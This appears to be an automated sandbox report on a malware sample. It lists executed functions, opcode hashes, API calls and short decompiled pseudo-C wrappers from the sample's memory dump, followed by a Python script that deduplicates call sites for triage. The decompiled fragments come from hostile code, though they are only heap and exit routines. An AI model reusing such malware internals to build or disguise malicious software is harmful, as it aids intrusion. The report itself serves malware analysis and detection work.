                                                      • Instruction ID: 155b021fc12d7d791bbda0d29363d40638f927cdcb0abb8c62967fd88b7f7836
                                                      • Opcode Fuzzy Hash: 1d0e7750b204099d739529f408644c204a949a56f101fa2f733daef1ae28b775
                                                      • Instruction Fuzzy Hash: 11900261342045525949B19A5504507400AB7E0281791C016A1805950CCA679866E661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0776f73f3bcf053047aff79aeb94cf40a00f5a98aa13458022177824dc84fdc9
                                                      • Instruction ID: f36ff7a0d705ef4f1ef03665dc294ecf1649f149bd72fe0a472dd56c80fdd238
                                                      • Opcode Fuzzy Hash: 0776f73f3bcf053047aff79aeb94cf40a00f5a98aa13458022177824dc84fdc9
                                                      • Instruction Fuzzy Hash: AD90027130100813D515619A5604707000DA7D0281F91C416A0815558DDB978962B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d5bc254ced7d3c63fb67ce11f7d9d0df582a9eaa2138cdf259dac090975d6473
                                                      • Instruction ID: 9d5fba7ba1cadbd569960ded02a351b8d68b06fa6232cb46849878ad2b876c23
                                                      • Opcode Fuzzy Hash: d5bc254ced7d3c63fb67ce11f7d9d0df582a9eaa2138cdf259dac090975d6473
                                                      • Instruction Fuzzy Hash: CB90026170100902D505719A5504616000EA7D0281F91C026A1415555ECF6689A2B171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2f3fdf2b2805d97d2acc3fe79b7ed65323101542549afcfc153dd407c78147bc
                                                      • Instruction ID: 432a8bba4f1959bc5cc920131945690e1718918dca03fd7af9328744f814fb37
                                                      • Opcode Fuzzy Hash: 2f3fdf2b2805d97d2acc3fe79b7ed65323101542549afcfc153dd407c78147bc
                                                      • Instruction Fuzzy Hash: BD90027130140802D504619A591470B0009A7D0342F51C015A1555555DCB66886175B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c614be5e7071c78f03e03ceba6fcde7d7aa453da1014dad068e45ea27fc22cf2
                                                      • Instruction ID: dcd6b6046f38a2df0d23c49022a4f367c3d8fdf20df50f8b56f95124dad212ca
                                                      • Opcode Fuzzy Hash: c614be5e7071c78f03e03ceba6fcde7d7aa453da1014dad068e45ea27fc22cf2
                                                      • Instruction Fuzzy Hash: 3490026170100442454471AA99449064009BBE1251751C125A0D89550DCA9A887566A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d2a3daa10bee58eae1ce9423c6f956736e1757c1b80c8b63e1395b3233ca5c83
                                                      • Instruction ID: c2a1d0860ad5992d4230746aee8af0c42aa34a29c1f75f09953e006bd46d294a
                                                      • Opcode Fuzzy Hash: d2a3daa10bee58eae1ce9423c6f956736e1757c1b80c8b63e1395b3233ca5c83
                                                      • Instruction Fuzzy Hash: 3090026131180442D60465AA5D14B070009A7D0343F51C119A0545554CCE5688716561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: da38b8d79691d8f121697f2b8bea231a15d8a3955cf8a92e5bbe62e81bdf7db3
                                                      • Instruction ID: 17b60c2d2d77565ae8ff779f151f6b1de43e9cf9252de774fdc3d365390f916b
                                                      • Opcode Fuzzy Hash: da38b8d79691d8f121697f2b8bea231a15d8a3955cf8a92e5bbe62e81bdf7db3
                                                      • Instruction Fuzzy Hash: 15900265311004030509A59A1704507004AA7D5391351C025F1406550CDB6288716161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a0873d9f8e0d99bab64e9bf7573a1ff32ad747eab350c1f597d7f3c921bdead1
                                                      • Instruction ID: 1c78261e1c1858cc0c86bf590ce636940639a6a41c6aa82ce6174213750b6075
                                                      • Opcode Fuzzy Hash: a0873d9f8e0d99bab64e9bf7573a1ff32ad747eab350c1f597d7f3c921bdead1
                                                      • Instruction Fuzzy Hash: F49002A1302004034509719A5514616400EA7E0241B51C025E1405590DCA6688A17165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7cde3c54ca7b5eeeab48f8cb8cd9ce23708a51cb235be05116a6c44fb4822b55
                                                      • Instruction ID: f44ea25c8594d208e5d9acf5be9f88b30eaf7c754377fe24b3baf92fe5eb762b
                                                      • Opcode Fuzzy Hash: 7cde3c54ca7b5eeeab48f8cb8cd9ce23708a51cb235be05116a6c44fb4822b55
                                                      • Instruction Fuzzy Hash: E890027130100802D50465DA65086460009A7E0341F51D015A5415555ECBA688A17171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 772839ec3d7dee52b2ebc8be1e2b5bfdfc66b08db31a816c1dd3dd8728707552
                                                      • Instruction ID: 25c5c94774f98f1a6ceac27b3d36f63ac3b0dc33dd073f1b9ba7a77e06dbe306
                                                      • Opcode Fuzzy Hash: 772839ec3d7dee52b2ebc8be1e2b5bfdfc66b08db31a816c1dd3dd8728707552
                                                      • Instruction Fuzzy Hash: BC90026931300402D584719A650860A0009A7D1242F91D419A0406558CCE5688796361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b7a14298f0059e66a6ccd54fbc07bfafc47b876a9eaff68dc99f36cd68af1c64
                                                      • Instruction ID: 434c374bc4e517e61daa1d404e6206db30cf2865dc37db015f9b47e2e110c88f
                                                      • Opcode Fuzzy Hash: b7a14298f0059e66a6ccd54fbc07bfafc47b876a9eaff68dc99f36cd68af1c64
                                                      • Instruction Fuzzy Hash: 9890026130100403D544719A65186064009F7E1341F51D015E0805554CDE5688666262
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 48dc4b8b259444eebe6391e09f1ab49332c6cf05525ee00845a79c38469afa95
                                                      • Instruction ID: a923b7c49f61af7b648a5094a9054fb991d2fd540bdd56bb2dcd730a624ab8bd
                                                      • Opcode Fuzzy Hash: 48dc4b8b259444eebe6391e09f1ab49332c6cf05525ee00845a79c38469afa95
                                                      • Instruction Fuzzy Hash: 5090027130100C02D584719A550464A0009A7D1341F91C019A0416654DCF568A6977E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8e43f33182dab284be7dd8f7578bfaf10239ca689cd05fe9b1772b7872c2e2bc
                                                      • Instruction ID: 617c7afba440ddc94bea8a86ada617610b9ff481d48944a5540a924f2c9f5089
                                                      • Opcode Fuzzy Hash: 8e43f33182dab284be7dd8f7578bfaf10239ca689cd05fe9b1772b7872c2e2bc
                                                      • Instruction Fuzzy Hash: 0590027130108C02D514619A950474A0009A7D0341F55C415A4815658DCBD688A17161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1bb275caa1728f5d5dd2494ae45ec2efdf94fc32c2d0c30b4409020cef5f3e0
                                                      • Instruction ID: f493815993e4fc4c3a6875a07b94849432042e8d3b26fb879fc08bb4095ad030
                                                      • Opcode Fuzzy Hash: c1bb275caa1728f5d5dd2494ae45ec2efdf94fc32c2d0c30b4409020cef5f3e0
                                                      • Instruction Fuzzy Hash: D7213AB2D4020857CB15DA64AD42BEF73BCAB54304F04007FE949A7182F63CBE498BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID: AP
                                                      • API String ID: 3899507212-2793870665
                                                      • Opcode ID: e11cd8ce792489e7f0247288d109cc12e7b30c60644da3b598ec523b86386c7d
                                                      • Instruction ID: 0aeed14f8f14a861a1771632da5fc79e280681a2740850a6af029c86995d3e36
                                                      • Opcode Fuzzy Hash: e11cd8ce792489e7f0247288d109cc12e7b30c60644da3b598ec523b86386c7d
                                                      • Instruction Fuzzy Hash: 79015EB52001086FCB10DF59DC80DEB77A9AF88314F11815AFD0C97341C634E865CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A1F0(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                                                      				void* _t10;
                                                      				void* _t15;
                                                      
                                                      				E0041AB20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                      				_t4 =  &_a16; // 0x414c6f
                                                      				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                                                      				return _t10;
                                                      			}





                                                      0x0041a207
                                                      0x0041a20c
                                                      0x0041a21d
                                                      0x0041a221

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLA
                                                      • API String ID: 1279760036-3789366272
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 33%
                                                      			E0041A1B7(void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12, long _a16, void* _a20) {
                                                      				intOrPtr _v0;
                                                      				char _t17;
                                                      				void* _t30;
                                                      				void* _t31;
                                                      				intOrPtr* _t34;
                                                      				void* _t36;
                                                      
                                                      				asm("popad");
                                                      				if(__eflags >= 0) {
                                                      					es = _t31;
                                                      					_pop(_t37);
                                                      					if(__eflags < 0) {
                                                      						ExitProcess(_a12);
                                                      					}
                                                      					asm("rcl dword [ebp-0x75], cl");
                                                      					_t14 = _a8;
                                                      					_push(_t31);
                                                      					_t8 = _t14 + 0xc74; // 0xc74
                                                      					E0041AB20(_t30, _a8, _t8,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
                                                      					_t17 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                                      					return _t17;
                                                      				} else {
                                                      					asm("int1");
                                                      					asm("int 0xcb");
                                                      					asm("lds edx, [eax-0x741374ab]");
                                                      					_t18 = _v0;
                                                      					_t3 = _t18 + 0xc6c; // 0xc6e
                                                      					_t34 = _t3;
                                                      					E0041AB20(_t30, _v0, _t34,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x33);
                                                      					return  *((intOrPtr*)( *_t34))(_a4, _a8, _t31, _t36, cs);
                                                      				}
                                                      			}









                                                      0x0041a1b7
                                                      0x0041a1b8
                                                      0x0041a22b
                                                      0x0041a22c
                                                      0x0041a22d
                                                      0x0041a298
                                                      0x0041a298
                                                      0x0041a22f
                                                      0x0041a233
                                                      0x0041a239
                                                      0x0041a23f
                                                      0x0041a247
                                                      0x0041a25d
                                                      0x0041a261
                                                      0x0041a1ba
                                                      0x0041a1ba
                                                      0x0041a1bb
                                                      0x0041a1be
                                                      0x0041a1c3
                                                      0x0041a1cf
                                                      0x0041a1cf
                                                      0x0041a1d7
                                                      0x0041a1ed
                                                      0x0041a1ed

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 424d4510562c2e4db0df0d0f61624b96989ab3d4dddc571078786a72601b0a29
                                                      • Instruction ID: 185a90659013397bcf8a483a4433d968440831471335218f927fb344ef3f7768
                                                      • Opcode Fuzzy Hash: 424d4510562c2e4db0df0d0f61624b96989ab3d4dddc571078786a72601b0a29
                                                      • Instruction Fuzzy Hash: D601D6B12011046FCB14EFA4DC88DE777A9EF84314F11859AFD1957202D631E915CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 34c5e111d4bfcb5c9815ecdacb22c50f7d4307e97e38cb80680b3eb705e01a22
                                                      • Instruction ID: 3694509a809f9f1e8fa8df973404460a336095567f3c8686c7e1b333279411b5
                                                      • Opcode Fuzzy Hash: 34c5e111d4bfcb5c9815ecdacb22c50f7d4307e97e38cb80680b3eb705e01a22
                                                      • Instruction Fuzzy Hash: AD01D831A803287BE720A6959C43FFE772C6B40F54F04401EFF04BA2C2EAA9691543E9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 88450cfb778f1e1af3d2656188a8999f908b1537f2f8bc008262317800155d5c
                                                      • Instruction ID: 7c0daabbf55dc8e5566c4ca1cfa2da6181a0a9091b78bf2f8488b58e794c74d3
                                                      • Opcode Fuzzy Hash: 88450cfb778f1e1af3d2656188a8999f908b1537f2f8bc008262317800155d5c
                                                      • Instruction Fuzzy Hash: BF01D431A803287BE720A6A58C03FFE762C6B40F54F04401AFF04BA1C1EAA8691542EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 5fac00a7328d1cedb1245bfbd6c1f4543ece85e23446dee2f3ee8c2721734e27
                                                      • Instruction ID: 6bf59bb4b1f3a6360bda39897125375e1333038054d9dc861319a4749ef772e1
                                                      • Opcode Fuzzy Hash: 5fac00a7328d1cedb1245bfbd6c1f4543ece85e23446dee2f3ee8c2721734e27
                                                      • Instruction Fuzzy Hash: 7FF0EDB12002047FCB14CFA5CC08EEB7B68EF89360F014A49FD09A7242C231E810CBB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 9fe14cfcdc25c2109f35fe76e5fbe089612bf0fa5fddfaa5a0161cc7b3210e93
                                                      • Instruction ID: 8baa55a0811b65819540b6218f605e63180e22f100fb95fe50e3dda7bc1ed5a7
                                                      • Opcode Fuzzy Hash: 9fe14cfcdc25c2109f35fe76e5fbe089612bf0fa5fddfaa5a0161cc7b3210e93
                                                      • Instruction Fuzzy Hash: B2E06DB56002046BDB10DF65CC85EEB3BAAEF856A0F00816AF90997242D931A8158BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: ebdd53004563edd2a4392b4df2e764d5b7b251018413f4144d29ce90c9d72ff3
                                                      • Instruction ID: eadfff77e68cf13cfe6bb92f4c4ca4bc655e7fe4297705652f30da219f738549
                                                      • Opcode Fuzzy Hash: ebdd53004563edd2a4392b4df2e764d5b7b251018413f4144d29ce90c9d72ff3
                                                      • Instruction Fuzzy Hash: 3CE02CB1644200AFDB20DF189C80FEB372D9F81324F028157FE0857242C030B82287BA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 8a25ee098a628307becc8e7b60ffaaf770aee037368f891479f304e21f4c3f84
                                                      • Instruction ID: d80e186d900301a896113a0f530628875be0ac6ff1358d6a3f77365f388a9c77
                                                      • Opcode Fuzzy Hash: 8a25ee098a628307becc8e7b60ffaaf770aee037368f891479f304e21f4c3f84
                                                      • Instruction Fuzzy Hash: F9E08CB6A01200BBE621DF14CC98FC33B79EF09368F01819AB9082F651C631BA10CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c5adaf0183764f90a3f422424c676243194726dcde5c529b50b3a77bf1ea8d1b
                                                      • Instruction ID: b5d9f9d7ee38a516bdb8b471f719d6d3dfb8c480daa21622475a56a15ce461e3
                                                      • Opcode Fuzzy Hash: c5adaf0183764f90a3f422424c676243194726dcde5c529b50b3a77bf1ea8d1b
                                                      • Instruction Fuzzy Hash: 91B02BB19010C9C5DB05D3A00708717390077C0300F12C011D1020640F4738C090F1B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

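The records above repeat the same call site more than once: the two LookupPrivilegeValueW entries share the dump file and the `ref: 0041A3C0` address but carry different Opcode IDs, and the same holds for the two ExitProcess entries at `0041A298`. The fifth record, from the region mapped at 0x10F0000, resolves no API call at all. The following parser is an added example, not part of the sandbox report: it splits the listing into records, groups them by dumped region, and collapses duplicate records onto one call site per address, so that a triage script counts two call sites in the 0x400000 image rather than four functions. The record labels are copied from the listing; the sample input is constructed from the five records shown here with the long hashes shortened, and the dotted fields of the `.sdmp` file name are kept as an opaque region identifier because the page does not document their layout.

```python
"""Collapse a sandbox 'Executed Functions' listing into unique API call sites
per dumped memory region.

Added example, not part of the report. The record labels ('APIs',
'Source File', 'Opcode ID', 'ref:') are copied from the listing above; SAMPLE
is constructed from the five records shown there with the long hashes
shortened. The dotted fields of the .sdmp file name are treated as an opaque
region identifier and are not decoded.
"""
import re

# Constructed sample input, in the report's own record layout.
SAMPLE = """\
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
Memory Dump Source
• Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: LookupPrivilegeValue
• Opcode ID: ebdd5300
Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
Memory Dump Source
• Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: LookupPrivilegeValue
• Opcode ID: 60662310
Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
Memory Dump Source
• Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExitProcess
• Opcode ID: caa18f4c
Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
Memory Dump Source
• Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExitProcess
• Opcode ID: 8a25ee09
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
Similarity
• API ID: InitializeThunk
• Opcode ID: c5adaf01
Uniqueness Score: -1.00%
"""

# One resolved API call inside a record, e.g.
# "• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298"
API_RE = re.compile(
    r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SRC_RE = re.compile(
    r"^• Source File: (?P<file>\S+?), Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)$"
)
OPCODE_RE = re.compile(r"^• Opcode ID: (?P<id>[0-9a-f]+)$")


def parse_records(text):
    """Split the listing at each 'APIs' header and extract the keyed fields."""
    records = []
    for chunk in re.split(r"^APIs$", text, flags=re.M):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if not lines:
            continue
        rec = {"calls": [], "opcode_id": None}
        for line in lines:
            if m := API_RE.match(line):
                rec["calls"].append((m["api"], m["module"], int(m["ref"], 16)))
            elif m := SRC_RE.match(line):
                rec["dump"] = m["file"]
                rec["offset"] = int(m["offset"], 16)
                rec["based_on_pe"] = m["pe"] == "true"
            elif m := OPCODE_RE.match(line):
                rec["opcode_id"] = m["id"]
        records.append(rec)
    return records


def summarise(records):
    """Group records by region base and merge duplicates describing one call site.

    Records with different Opcode IDs but the same 'ref:' address are the same
    call site reported more than once; keying the map by address keeps one
    entry per site so it is not counted twice.
    """
    regions = {}
    for rec in records:
        reg = regions.setdefault(rec["offset"], {
            "dump": rec["dump"],
            "based_on_pe": rec["based_on_pe"],
            "records": 0,
            "opcode_ids": set(),
            "call_sites": {},
        })
        reg["records"] += 1
        reg["opcode_ids"].add(rec["opcode_id"])
        for api, module, ref in rec["calls"]:
            reg["call_sites"][ref] = f"{module}!{api}"
    return regions


def regions_without_resolved_calls(regions):
    """Regions whose records resolve no API call; these need a manual look
    before any of their strings are promoted to indicators."""
    return sorted(base for base, reg in regions.items() if not reg["call_sites"])


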